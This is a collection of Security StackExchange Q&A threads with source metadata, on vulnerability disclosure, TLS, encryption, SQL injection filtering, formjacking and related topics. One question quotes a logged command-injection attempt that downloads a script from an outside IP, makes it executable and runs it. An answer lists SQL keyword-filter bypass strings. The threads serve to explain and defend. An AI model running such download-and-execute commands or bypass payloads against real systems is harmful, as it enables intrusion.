They were reporting on our website being indexed by googlebot (metadata, thin page content, anchor text issues) and an XSS vulnerability. We do not have any legal statement that I know of regarding VDP (vulnerability disclosure policy) yet. My questions: Basically how to proceed or even should we? (Are they legit?) What is the common expectation from a white hacker? How to validate the vulnerability? | To answer each of your questions: 1. Basically how to proceed or even should we? I recommend proceeding. You will be able to acquire valuable information that can immediately be put towards improving the security of your company. You haven't told us what the researcher has sent you, but they will either have a description of the vulnerability or methods to reproduce it. To proceed you will need from them: A description/attack scenario of the vulnerability found. Why is this an issue, what specifically does the bug allow an attacker to do that they shouldn't be able to do, what is the worst case scenario/severity of the finding. Reproduction steps. What steps could you give any engineer and allow them to reproduce the bug every time. What the hacker is looking for in return. As mentioned it may be permission to publish the finding after fixing or money. You might also want or receive remediation advice, risk scores, etc. from the researcher. VERY IMPORTANT: make it clear to the researcher that you expect them to keep the issue confidential until the issue is fixed. They may counter with a remediation window, e.g. they get to publish and article if the issue is not fixed within 60 days. This is common practice and should be acceptable to most companies with a strong security posture. 2. What is the common expectation from a white (hat) hacker? Depends on the researcher, but they will likely want permission to publish the finding once it's been fixed as well as a monetary reward. Reward prices are based on overall severity and size of the bounty program. Hackerone, a large bug bounty platform, has a matrix that suggests payouts relative to size of the company/bounty program: https://www.hackerone.com/resources/bug-bounty-basics . Determining payout price is a subtle art - I recommend searching hackerone or other bug bounty platforms for similar bugs and basing your payout on what other companies are paying for the same issue. Again - a common expectation researchers will have is that they get to publish the finding in a certain amount of time regardless of whether it's been fixed by then. 60 days is common, but I wouldn't agree to an amount of time if you're not confident your company can deliver in that window. After the issue is patched, the hacker may want to validate that the fix was implemented correctly. 3. How to validate? Use the reproduction steps the hacker has given you. They should be clear enough that any engineer can follow the steps exactly and reproduce the bug. If there are any issues here you can go back to the researcher and get clarification. It is the researchers responsibility to supply the company with reproduction steps that outline and identify the bug. Once the issue is fixed you can invite the researcher to validate the fix and ensure that it was patched completely. | {
"source": [
"https://security.stackexchange.com/questions/203521",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199013/"
]
} |
203,684 | If a client presents a higher cipher suite during ClientHello yet eventually negotiates a lower strength cipher suite within the same protocol version, though a higher cipher suite is available on both client and server, who is responsible? According to How does SSL/TLS work? it is ServerHello which ultimately decides the cipher suite. From that post: To remember: the client suggests but the server chooses. The cipher
suite is in the hands of the server. Courteous servers are supposed to
follow the preferences of the client (if possible), but they can do
otherwise and some actually do (e.g. as part of protection against
BEAST). To understand this question better, an example is provided below. Example With Firefox: There is a Client (A) and a Server (B). Client (A) is a Firefox version 65 browser. Server (B) is a web server serving a site over https. Behavior: Connections to Server (B) @ site.server.com are being negotiated from a stronger TLS 1.2 cipher suite to a less strong TLS 1.2 cipher suite, even when a stronger cipher suite is available on both the client and the server. This behavior is confirmed on Firefox 65. Steps to Reproduce: Disable TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 and all other weaker cipher suites in Firefox then reload site.server.com The site will load with TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 . Enable TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 while leaving TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 enabled as well then reload site.server.com. The weaker cipher suite will be chosen. In this scenario, who was responsible? ClientHello or ServerHello | The client sends only what ciphers it supports in the order of their preference. The server then selects one of these ciphers - which means only the server ultimately decides which cipher gets used . It is fully up to the server which cipher suite gets selected from the offered ones, i.e. the server might take the client preferences in account but might also completely ignore it. In fact, many servers have a configuration option which allows the server to use either the cipher preferred by the client or the cipher preferred by the server. | {
"source": [
"https://security.stackexchange.com/questions/203684",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196572/"
]
} |
203,750 | Consider symmetric GPG encryption of a given file my_file.txt . Something like (in command line) gpg --symmetric --cipher-algo AES256 my_file.txt After suppying the prompt with the new password, the above produces my_file.txt.gpg . I could then encrypt again: gpg --symmetric --cipher-algo AES256 my_file.txt.gpg (where you would want to set a different password) And so on. Is there a limit on how many iterations of the above I can do? It seems to me there isn't, as symmetric encryption just takes a piece of text and transforms it into another, without ever asking what the piece of text is in the first place. Is this true? | Theoretically, there's no limit on the number of times you can encrypt a file. The output of an encryption process is again a file, which you can again pass it on to a different algorithm and get an output. The thing is, at decryption side, it will have to be decrypted in LIFO (last in, first out) style, with the proper passwords. For example, if your file was first encrypted with algo1 with password abcde , and then it was encrypted with algo2 with password vwxyz , then it will have to be decrypted first with algo2 (with password vwxyz ), and then with algo1 (with password abcde ). This method makes sense if you're sending the keys through different media or channels. This method would be of little use if all the passwords are sent through the same channel. | {
"source": [
"https://security.stackexchange.com/questions/203750",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/185302/"
]
} |
203,830 | The comments in this question debate about the added security of multi-layered encryption. There seems to be some disagreement, and I thought a proper question would be helpful here. So, to provide some common background, consider the following two scenarios: I apply symmetric encryption to a given file, as follows: gpg --symmetric --cipher-algo AES256 my_file.txt to which I add the password "mydogisamazing" I apply four layers of encryption to a given file, as follows: gpg --symmetric --cipher-algo AES256 my_file.txt
gpg --symmetric --cipher-algo AES256 my_file.txt.gpg
gpg --symmetric --cipher-algo AES256 my_file.txt.gpg.gpg
gpg --symmetric --cipher-algo AES256 my_file.txt.gpg.gpg.gpg where the passwords supply to each are, respectively: "amazing" "is" "dog" "my" (so, when I decrypt all the layers, I have entered "my" "dog" "is" "amazing") Is option 2 more secure than option 1? Knowing almost nothing about encryption security, it seems to me it is, because anyone wanting to break in would have to run some password algorithm four times, whereas in option 1 the algorithm needs to be run 1 time only. What if different chiper-algo were used instead of the same? All in all, it seems also obvious to me that the answer does depend on the nature of the passwords. For instance, if I have 15 layers of encryption and each layer's password is merely one letter, it seems "trivial" to break the code. UPDATE : in response to a comment, I stress that the example above was trying to present an apparent "equivalent" case, i.e "shorter passwords + more layers" versus "longer passwords + less layers". It seems only obvious to me (maybe wrong) that merely adding more layers of identical complexity will only increase the security of the encryption (in the mere sense of taking longer to hack the passwords). Hence my stress on the varying length of passwords. | Option 1 is more secure. In option 2, we can guess each word seperately. When we guess "amazing", we get confirmation that this word is correct and we can continue to the second word. In option 1, we have to guess all four words at the same time. You may think that one GPG offers some security, and four GPGs offer four times that security, but it doesn't work like that. GPG offers near total security, and applying it more times does not improve security. There are uses for applying encryption multiple times, for example when both signing and encrypting, or when encrypting for multiple parties. However, encrypting things several times does not in general makes them several times more secure. | {
"source": [
"https://security.stackexchange.com/questions/203830",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/185302/"
]
} |
203,843 | I'm wondering if it is possible to detect 100% of the possible SQLi attacks using a simple regex. In other words, using very simple PHP code as an example: if (preg_match("/select/i", $input)) {
attack_log("Possible SELECT SQLi detected.")
} The questions are: Will that regex catch all possible SQLi attacks that use SELECT? If not, is it possible to change that regex so that it is going to detect all injections that rely on SELECT? Is it possible to change that regex to so that it will catch all possible SQLi, so not only SELECT statements but also all the rest? I'm afraid that to achieve this I would need to add every possible SQL keyword to the regex, including "AND" and "OR". Supposing it's not possible or feasible to detect all SQLi by trying to match all the possible SQL keywords, is there a limited subset of keywords that would allow me to detect the vast majority of possible attacks? | Keyword filtering for SQLi is not a good technique. There are too many ways to bypass it. Crazy things like sel/**/ect might work, for instance. Or playing games with substr() . And then there's EXEC('SEL' + 'ECT 1') . There are many guides on how to bypass common filtering techniques. But then you might ask if there is a superset of things to filter for (like select and /**/ and substr and EXEC ), but then the list gets very, very long, and you still might not get a comprehensive list. The better approach is to understand the range of acceptable inputs and protect those or to make it ineffective to use SQLi through proper design. | {
"source": [
"https://security.stackexchange.com/questions/203843",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/175681/"
]
} |
203,859 | I am buying a "new" router from an open-box sale at a company that liquidates eCommerce returns. Plan to use it for a home network at cottage. I'm a bit nervous that it could have been modified by whoever had it last. What are the main risks in this scenario? What specific steps should one take before and during setup of a new router that someone else may have had access to in the past? Update: The device model is a TP-Link AC4500 (archer) router. | Short answer: do a factory reset, update the firmware, and you are good to go. The risk is very low, bordering zero. The previous owner may have installed a custom firmware or changed its configuration, but a firmware upgrade and factory reset is enough to take care of almost every change. The risk that the previous owner tampered with the router and his changes can survive even a firmware upgrade and factory reset is negligible. So, don't worry, unless you are a person of special interest : working on top-secret stuff or have privileged financial information on a big enterprise. But as you are buying a used router, I bet you are a common guy and would not be a target for those attacks. | {
"source": [
"https://security.stackexchange.com/questions/203859",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91274/"
]
} |
203,987 | I just heard a very confused news broadcast about Symantec warning the world about the dangers of formjacking. The newsreader said it involved “hacking the form, not the website” whatever that means. I googled around and found a Symantec blog post about it, where they describe the attack as follows: The attacker “injects” malicious JavaScript into the targeted webpage The user fills out the form on that webpage The JavaScript sends the entered data to the server of the attacker. However, I would say that if an attacker has write access to the code on the server formjacking is the least of your concerns (and not the actual vulnerability – whatever gave them access is). Why is formjacking the big deal (it was on the national news where I live) and not the fact that tons of websites (among which British Airways according to Symantec) have a ridiculously large vulnerability that allows attackers access to their servers? | The Symantec article you are referring to is like this one . Looking at the graphic : Point 1 is what is generally the most interesting to security researchers, because that is where the vulnerability is. Points 2 and 3 just show what might be possible with such a vulnerability. For example, JavaScript can be used in phishing attacks (show a fake form) or to read out any data the user enters into forms. This is what Symantec calls formjacking, but it's of course nothing new. Their article also has a section "How are websites being compromised?", which will likely interest you. Vulnerabilities do indeed include the option to change server-side code, though not necessarily of the main application, but especially in JavaScript dependencies. Issues with including 3rd party JavaScript are of course nothing new either. Burp eg calls it Cross-domain script include , and OWASP warns about it as well. Including 3rd party scripts always requires complete trust in the 3rd party as well as trust in their security processes. Why is formjacking the big deal Good marketing on the part of Symantec? | {
"source": [
"https://security.stackexchange.com/questions/203987",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21254/"
]
} |
203,997 | For example, it is possible that someone could spread malware with insecure wifi access point, but I don't realize how sending a bunch of network packets can result into a compromised computer if the transferred malicious code can't be explicitly(i.e. allowed by user) executed. Can you refer to the description on how this normally happens in reality? I consider only cases when computer user doesn't realize there is something wrong going inside it, and those which are related to code execution. | The Symantec article you are referring to is like this one . Looking at the graphic : Point 1 is what is generally the most interesting to security researchers, because that is where the vulnerability is. Points 2 and 3 just show what might be possible with such a vulnerability. For example, JavaScript can be used in phishing attacks (show a fake form) or to read out any data the user enters into forms. This is what Symantec calls formjacking, but it's of course nothing new. Their article also has a section "How are websites being compromised?", which will likely interest you. Vulnerabilities do indeed include the option to change server-side code, though not necessarily of the main application, but especially in JavaScript dependencies. Issues with including 3rd party JavaScript are of course nothing new either. Burp eg calls it Cross-domain script include , and OWASP warns about it as well. Including 3rd party scripts always requires complete trust in the 3rd party as well as trust in their security processes. Why is formjacking the big deal Good marketing on the part of Symantec? | {
"source": [
"https://security.stackexchange.com/questions/203997",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199001/"
]
} |
204,249 | I know its best practice not to allow shared user accounts, but where is this best practice defined? Is it an ISO standard or something? What is the reasons to always create per person accounts? | Alice and Eve work for Bob. Alice is a very good worker who does exactly what Bob asks her to do. Eve is a criminal mastermind hell-bent on destroying Bob's company. Alice and Eve both share the same account. Eve logs into the account and uses it to sabotage an important business process. The audit log captures this action. How does Bob know who sabotaged his company? He has to get rid of the bad actor, but can't fire both of them, because his company depends on the work that they do. He could fire just one, but he has no way of knowing which one is his friend and which one is his enemy. If Alice and Eve had separate accounts, Bob could be sure that Eve was the one who did the sabotage. Eve might even avoid doing the sabotage, if she knows her account will be audited and she will be caught. EDIT: Adding from comments: If Eve quits, you now need to reset the password on every account she had access to, rather than just disabling her personal accounts. This is much harder to manage, and you will miss accounts. Additionally, it removes your ability to have granular control over access. If Alice should be writing checks, and Eve should be signing them, you essentially have no technological way to enforce that if they share the same account. Also, it makes it harder for a given individual to notice malicious changes to their environment. Alice knows what files are on Alice's desktop. Any new files will likely raise a red flag for her. Alice doesn't know what files are on Alice and Eve's shared desktop. It is likely new files will be met with a shrug and an assumption that another user put it there, not a malicious actor. | {
"source": [
"https://security.stackexchange.com/questions/204249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200520/"
]
} |
204,265 | Let's say we have a password.txt in a webdirectory that must not be leaked. Is it secure to use a RewriteRule like this? RewriteRule "^password.txt?*" "404.html" I tried to do something fishy like domain.com/somefile/../password.txt , or using "password%2Etxt", and it still redirected to 404. Is there anything else I have to worry about? If it's hackable, what's the hack? My understanding of the URL specification is that this is not possible. But, I'm handwaving a bit. Will the input to a rewriterule always be something guaranteed by the URL specification, or will they relax the requirements a bit the way css can be relaxed. If not, is the URL specification itself safe against this redirection? I can use .htaccess to simply ban the file, but then RewriteRule "sldmfklwmefwk.txt" "password.txt" doesn't work either. I want "sldmfklwmefwk.txt" to be allowed, but "password.txt" is banned, and any other attempts to access "password.txt" being blocked without accessing it via "sldmfklwmefwk.txt". | Alice and Eve work for Bob. Alice is a very good worker who does exactly what Bob asks her to do. Eve is a criminal mastermind hell-bent on destroying Bob's company. Alice and Eve both share the same account. Eve logs into the account and uses it to sabotage an important business process. The audit log captures this action. How does Bob know who sabotaged his company? He has to get rid of the bad actor, but can't fire both of them, because his company depends on the work that they do. He could fire just one, but he has no way of knowing which one is his friend and which one is his enemy. If Alice and Eve had separate accounts, Bob could be sure that Eve was the one who did the sabotage. Eve might even avoid doing the sabotage, if she knows her account will be audited and she will be caught. EDIT: Adding from comments: If Eve quits, you now need to reset the password on every account she had access to, rather than just disabling her personal accounts. This is much harder to manage, and you will miss accounts. Additionally, it removes your ability to have granular control over access. If Alice should be writing checks, and Eve should be signing them, you essentially have no technological way to enforce that if they share the same account. Also, it makes it harder for a given individual to notice malicious changes to their environment. Alice knows what files are on Alice's desktop. Any new files will likely raise a red flag for her. Alice doesn't know what files are on Alice and Eve's shared desktop. It is likely new files will be met with a shrug and an assumption that another user put it there, not a malicious actor. | {
"source": [
"https://security.stackexchange.com/questions/204265",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/189233/"
]
} |
204,392 | If I delete my router's history, is it still visible and can my ISP still provide it to my parents?
Or is it deleted from existence? | If I delete my router's history, is it still visible and can my ISP still provide it to my parents? Or is it deleted from existence? Your ISP's record of your network usage isn't in any way affected by you doing anything to your router. You could wipe its memory, subject it to an EMP, and crush its chips to dust, and it wouldn't have any effect on them. :-) They maintain their own logs, which you cannot delete. Whether your ISP will provide that information to your parents is another question, I expect it varies by locale/jurisdiction and possibly ISP. You can make it (nearly) impossible for your ISP to know what sites you're visiting by using Tor or similar. The project includes Tor Browser, based on Firefox ESR, which makes it really easy to browse over Tor. You can also use the Brave browser (no affiliation), based on the Chromium project, in its "Private window with Tor" mode. This is not user-configuring a browser for Tor (which the Tor project advises against, it's too easy to miss out important things), it's a browser from privacy-obsessed people with a Tor-enabled private browsing mode. Both Tor Browser and Brave have trade-offs, see this tweet thread (in particular the replies from Tom Lowenthal, their Security & Privacy PM). Some people say "You should never browse with Tor with anything but Tor Browser" but it's more nuanced than that. | {
"source": [
"https://security.stackexchange.com/questions/204392",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200679/"
]
} |
204,450 | What is more secure, having one password of length 9 (salted and hashed) or having two different passwords, each of length 8 (salted and hashed using two different salts)? | As John Deters has noted, 2x8 is almost certainly worse - but the reasons why take a little explaining. There were a couple of problems with LANMAN hashes (the classic case of breaking a password in half, gone awry): Since passwords tend to be human-generated and somewhat short, if a single password was only a little longer than the first half (say, 8 characters), then cracking the second half would take dramatically less time - and could even give away what the first half was likely to be LANMAN was just so darned fast (for the attacker to attempt, in hash operations per second) LANMAN cut the passwords in two at an unfortunate length (7), that was quite susceptible to full exhaustion (and even moreso on modern GPUs) However, your question is a little different from the LANMAN case: It does not state that the 2x8 passwords are actually a single password broken in half (they could be independently generated, and random) It explicitly states that the two passwords are of length 8 (rather than, say, one of length 8 and the other of length 1, the famous LANMAN worst case) Unless your salts are trivially small, building rainbow tables would be infeasible - which is the purpose of salting (unlike LANMAN hashes, which were entirely unsalted) So it's an interesting question - one that's largely answered by looking at the associated math. Let's make some assumptions: Both the 9x1 and 8x2 approaches are salted and hashed using the same
salt lengths and algorithms Worst case for the attacker - the passwords are randomly generated from the printable ASCII character set (95 chars), with reasonably long salts. (The question would be less interesting if the passwords were human-generated, because in practice they would usually fall to easy attacks long before the attacker would have to resort to brute force) Modern hardware and speeds are fair game The hash algorithm may or may not be parallelism-friendly Given all of the above, I'd roughly expect: The 1x9 hash would be 100% exhausted in 95^9 (6.302 × 10^17) hashing operations (which might be parallelized well or poorly). The 2x8 hashes would be jointly 100% exhausted in (95^8)x2 (1.326 × 10^16) hashing operations (and no matter the algorithm, could easily be naively parallelized simply by cracking each hash on a different system - but can often be parallelized very efficiently on a single system as well, depending on the algorithm). In other words: That 9th character adds 95 times the work to exhaust, and might be hard to parallelize Two 8-character passwords only doubles the amount of work needed, and can be trivially parallelized Another way to think about it is that adding one more character roughly creates the same work as having to crack 95 eight-character passwords ! (If this isn't intuitive, start with simple cases comparing smaller cases like 1x1 vs 1x2, until you understand it). So all other things being equal, 1x9 should almost always be better than 2x8 . And really, this is not only a simple illustration of the power of parallelization, it should also make it obvious why allowing longer password lengths is so crucial. Each additional character in the model above adds 95 times work to the overall keyspace. So adding two characters adds 95^2 - or 9025 times - the work. Brute force quickly becomes infeasible, even for very fast and unsalted hashes. This would make an excellent homework question. ;) | {
"source": [
"https://security.stackexchange.com/questions/204450",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200737/"
]
} |
204,459 | I have very little experience with security (still learning) however was combing through my logs and I noticed the following request: "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions. My question is what kind of attack is this and what steps can I take to prevent it? | It's a command injection attack in which : the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation. There are many strategies to mitigate or to avoid this kind of attacks like: Do not “exec” out to the Operating System if it can be avoided. Validate untrusted inputs.(Character set,Minimum and maximum length,Match to a Regular Expression Pattern...) Neutralize meta-characters that have meaning in the target OS command-line. Implement “Least Privilege” You can find somes here and have a look at this cheatsheet from OWASP for further details. | {
"source": [
"https://security.stackexchange.com/questions/204459",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200751/"
]
} |
204,530 | I'm reading through the extensive description on which data is acquired by Microsoft's telemetry 1 including the following paragraph: User generated files -- files that are indicated as a potential cause for a crash or hang. For example, .doc, .ppt, .csv files I was wondering whether Microsoft actually gathers data from a Word document, in case word crashes (hope on being wrong on this one). Is Microsoft getting the 'whole' file, only a paragraph or am I misreading that part of the documentation? | Here is what they spy on, finally officially admitted after being proved again and again by different independent sources. That should make a pretty good idea on what actually is transmitted. To actually see what's being reported you can give yourself permissions for %ProgramData%\Microsoft\Diagnosis directory and look what's in there, but the file are encrypted which is a very suspicious thing. What you can look at in the newer version is the Diagnostic Data Viewer. But that does NOT guarantee or prove that there is documents privacy in any way. At this point my guess is that they will transmit parts of files that generated crashes, or if they consider proper to do so and definitely can transmit any type of document via the encrypted content in \Diagnosis and https as the transmission way. Their EULA states: Finally, we will access, disclose and preserve personal data,
including your content (such as the content of your emails, other
private communications or files in private folders), when we have a
good faith belief that doing so is necessary to: comply with
applicable law or respond to valid legal process, including from law
enforcement or other government agencies;
2. protect our customers, for example to prevent spam or attempts to defraud users of the services, or to help prevent the loss of life or
serious injury of anyone; 3. operate and maintain the security of our
services, including to prevent or stop an attack on our computer
systems or networks; or
4. protect the rights or property of Microsoft, including enforcing the terms governing the use of the services - however, if we receive
information indicating that someone is using our services to traffic
in stolen intellectual or physical property of Microsoft, we will not
inspect a customer's private content ourselves, but we may refer the
matter to law enforcement. Conclusion: they can and will do it at will. | {
"source": [
"https://security.stackexchange.com/questions/204530",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200829/"
]
} |
204,669 | Even though sometimes software bugs and vulnerabilities are deemed as the same concept, there must be at least one distinct aspect between them, and I think the most prominent one is exploitability (the latter one having the property). What I'm curious about is, even after seeing many cases that divide-by-zero bugs are reported as software problems, I can hardly come up with any attack (other than DoS) using divide-by-zero bugs. I know not all kinds of bugs have the same impact upon a system in terms of security, but is there any attack method that uses divide-by-zero bugs to achieve something different than DoS, like privilege escalation for example? | At issue is that an exception handler will be invoked to handle the division by zero. In general, attackers know that exception handlers are not as well-tested as regular code flows. Your main logic flow might be sound and thoroughly tested, but an exception handler can be triggered by interrupts occurring anywhere in the code within its scope. int myFunction(int a, int b, SomeState state) {
state(UNINITIALIZED);
try {
state.something(a/b);
state(NORMAL);
}
catch () {
state.something(b/a);
state(INVERTED);
}
return retval;
} This horrible pseudocode sort of illustrates one way the flaw could be exploited. Let's say that an uninitialized state is somehow vulnerable. If this routine is called, the state is first uninitialized. If b is zero, it catches the exception and tries to do some other logic. But if both a and b are zero, it throws again, leaving state uninitialized. The division by zero itself wasn't the vulnerability, it's the bad code around it that's possible to exploit. | {
"source": [
"https://security.stackexchange.com/questions/204669",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199967/"
]
} |
204,701 | I recently was emailed from HaveIBeenPwned.com (which I am signed up on) about the ShareThis website/tool (not signed up on). I have no memory of signing up for that service. When I go to recover the account (I might as well close/change password), I get this: The two facts seem mutually exclusive: Either I had an account and it was pwned, or I didn't have an account (and thus HIBP is in error)? How do I find out the true situation, and what is the most secure course of action? | From the FAQ : Why do I see my email address as breached on a service I never signed up to? When you search for an email address, you may see that address appear against breaches of sites you don't recall ever signing up to. There are many possible reasons for this including your data having been acquired by another service, the service rebranding itself as something else or someone else signing you up. For a more comprehensive overview, see Why am I in a data breach for a site I never signed up to? It's likely some services allow signing up without confirming an email address, or that accounts that haven't confirmed email addresses are still stored indefinitely but cannot be logged in to, or any number of similar issues. | {
"source": [
"https://security.stackexchange.com/questions/204701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11640/"
]
} |
204,770 | I read that you can write anything into the From: field of an e-mail. If that is true, then why are phishing e-mails trying to trick me with look-a-like addresses like [email protected] instead of just using the actual [email protected] itself? | While one could create a mail with @amazon.com as SMTP envelope and/or From field of the mail header, the mail would likely be blocked since this domain is protected with Sender Policy Framework ( SPF ), DomainKeys Identified Mail ( DKIM ), and Domain-based Message Authentication, Reporting and Conformance ( DMARC ). This means that a spoofed mail would be detected as such and get rejected by many email servers. Contrary to this using another domain which is not protected this way or which is protected but controlled by the attacker is more successful. To explain in short what these technologies do: SPF Checks if the sender IP address is allowed for the given SMTP enveloper (SMTP.MAILFROM). dig txt amazon.com shows that a SPF policy exists. DKIM The mail server signs the mail. The public key to verify the mail is retrieved using DNS. Amazon uses DKIM as can be seen from the DKIM-Signature fields in the mail header. DMARC Aligns the From field in the mail header (RFC822.From) with the domain of the DKIM signature for DKIM or the domain of the SMTP envelope for SPF. If an aligned and successful SPF/DKIM exists the DMARC policy matches. dig txt _dmarc.amazon.com shows that Amazon has a DMARC record with a policy of quarantine . Neither SPF nor DKIM by their own help against spoofing of the From field in the mail header. Only the combination of at least one of these with DMARC protects against such header spoofing. | {
"source": [
"https://security.stackexchange.com/questions/204770",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76285/"
]
} |
204,777 | My university sent me an email informing me that, during a "periodic check", my password was found to be "easily discoverable and at risk of compromise". As I understand it, there shouldn't be a way for them to periodically check my password unless my password was stored in plaintext. My question: Is my understanding wrong, or has my university been storing my password in plaintext? UPDATE: The school IT department linked me to a page explaining the various ways they check passwords. Part of the page allowed me to run the tests on my university account and display the password if it was indeed discovered from their tests. The password it displayed was an older (weaker) password of mine that was simply English words separated by spaces, which explains how they were able to find it. | Your understanding is wrong. If passwords are stored as a strong salted hash, the administrator can’t find good user passwords, but can find ones that are on lists of commonly used passwords by applying the hash and salt to every password on the list and looking for a match. It’s a lot easier if the stored passwords aren’t salted, though, since in that case you only have to run it once and not once per user, so this may indicate that the stored passwords are not salted, which is contrary to best practice. | {
"source": [
"https://security.stackexchange.com/questions/204777",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/201168/"
]
} |
204,833 | If I have a domain, https://www.example.com . It has an SSL certificate for that domain only. I also want to redirect people who only type example.com in their browser's address bar. Should I secure the second domain https://example.com and why, or HTTP only is enough? I don't use a wildcard SSL certificate. | If you don't secure example.com and a user visits that site, a man-in-the-middle attacker can manipulate the traffic and keep the user on example.com , where he can intercept all traffic. It doesn't matter that your version of example.com redirects to https://www.example.com/ . The attacker can change this behavior and offer a HTTP version of your site to the user. | {
"source": [
"https://security.stackexchange.com/questions/204833",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/201224/"
]
} |
204,876 | Is there a comparison between Ghidra and Ida? Are there any specific features and functionality that Ghidra while Ida doesn't? Is there a good source (most preferably book) that explain Ghidra in detail? | This is largely subjective, but: Ghidra is free and open-source on GitHub , including the decompiler. IDA is very expensive, particularly when you start adding the decompiler licenses. IDA supports some architectures that Ghidra doesn't, and vice versa. IDA has a debugger whereas Ghidra does not. As of 2021, the stable branch of Ghidra now incorporates a debugger through gdb or WinDBG. Ghidra has the ability to load multiple binaries at once into a project, whereas IDA support for this is limited and mostly an ugly hack. This means that you can trace code between an application and its libraries more easily. Ghidra's disassembler has data flow analysis built in, showing you where data can come from when you click a register or variable. IDA has "dumb" text highlighting to show other uses of that register. These features are slightly different implementations of the same concept and both have their uses. Ghidra has collaborative disassembly/decompiler projects built in by design, whereas IDA requires plugins to do collaboration and the IDA database files are not designed to be shared. Ghidra has an undo button! And it works! (IDA doesn't and it's super annoying) As of version 7.3 IDA has an undo feature. IDA is way more mature and has a lot of little features that have been added over the years that Ghidra cannot (yet) mirror. Since IDA is a more mature and ubiquitous product, there are a lot of open-source tools built around it. Ghidra appears to have better support for very large (1GB+) firmware images with decent performance. It also doesn't have problems with analysing firmware images that declare large memory regions. IDA historicallly has had problems with this and it can be quite frustrating. Anecdotally, Ghidra's support for disassembling Windows OS binaries (e.g. kernelbase.dll) is currently broken due to some bugs with the x86 instruction decoder. There are issues on GitHub talking about this. These points are true at time of writing (March 2019) but may change over time. | {
"source": [
"https://security.stackexchange.com/questions/204876",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95113/"
]
} |
205,009 | I'm working on integrating a payment system with paypal in C#, and I installed the official paypal nuget package. Then I went to the paypal github site . And linked to this below site (SDK Reference) . At this point both Chrome and Firefox warned me about Deceptive Site Ahead Is this site really dangerous? URL's are listed here so that people don't need to click on potentially dangerous links: https://github.com/paypal/PayPal-NET-SDK
http://paypal.github.io/PayPal-NET-SDK/Samples/PaymentWithPayPal.aspx.html | No, it's not dangerous at all. Your browser is warning you because a non-Paypal website has Paypal in its name. This is a common technique used by phishing sites that attempt to fool you into thinking the site is official. For example, a website might be called paypal.secure1234.com and made to look like the official site, enticing you to trust it and input your sensitive credentials. The browser has no way of knowing that the site you are visiting has Paypal in its name for completely benign reasons. | {
"source": [
"https://security.stackexchange.com/questions/205009",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/79965/"
]
} |
205,193 | Microsoft has announced Windows 7 will no longer be receiving updates after January 14, 2020: Here . I hate windows 10's forced updates and telemetry so I have always stuck with Windows 7, but it may be as good as dead after the lack of security updates. Linus Tech Tips did a great video covering this issue: Here . With this massive change I was wondering if anyone knew of the real impact this would have. Can third-party Anti-virus successfully substitute Windows 7 security updates after they are discontinued? Right now I use Malwarebytes and AVG, and I feel as though this would be enough but this is something you have to be sure about. With Windows Vista I feel as though this has already been studied but, I am not clever enough to google the right words. So I have turned to the amazing community here for solid answers. Is Windows 7 being left 4 dead, or is Y2K coming back for round 2? | Nope. After Microsoft discontinue security updates for a version of Windows there is not a safe way to run that version of Windows. Some people will promote Virtual Patching where you have a external firewall scan all your traffic looking for patterns of traffic that look malicious. I would not trust that, and it requires a seperate non-vulnerable computer. A number of vulnerabilities patched by Microsoft are not the sort that anti-virus are good at catching. In the most recent example Google announced a Chrome Bug plus Windows 7 bug that caused visiting a site to remotely execute arbitrary code, this was being used in the wild. After end-of-life Microsoft will not patch this type of bug. ( https://www.zdnet.com/article/google-chrome-zero-day-was-used-together-with-a-windows-7-zero-day/ ) | {
"source": [
"https://security.stackexchange.com/questions/205193",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/201396/"
]
} |
205,200 | I'm looking at setting up secure laptops using BitLocker with pre-boot PIN and startup key. I'm wondering if there is a way to force the user, who is remote, to remove the USB with the startup key before they can log on or use Windows. Otherwise, what's to keep the user from just leaving the USB connected all the time, which would pretty much negate its value? One way, of course, is to make it impractical for the user to leave the USB connected, like permanently attaching it to a large object. But that's also generally impractical and not a great solution. Is there a solution or standard approach for this that can actually force the removal of the device? | You are trying to use a technical tool to solve a social problem. The answer is that cannot fit. Techniques can provide great security when correctly used, but only user education can allow proper use. I often like the who is responsible for what question. That means that users should know that they will be accountable for anything that could be done with their credentials. It is not enough to prove that they did not do it, they shall prove that they correctly protected their credentials. The physical analogy can also help. They would not let the key of a physical safe unattended. They should understand that when they are given reasonably secured credentials, they should see it as a physical key and use it the same. But as they are used to their own home computer with no security at all, education is hard and things are to be repeated. Unfortunately, I have never found a better way... | {
"source": [
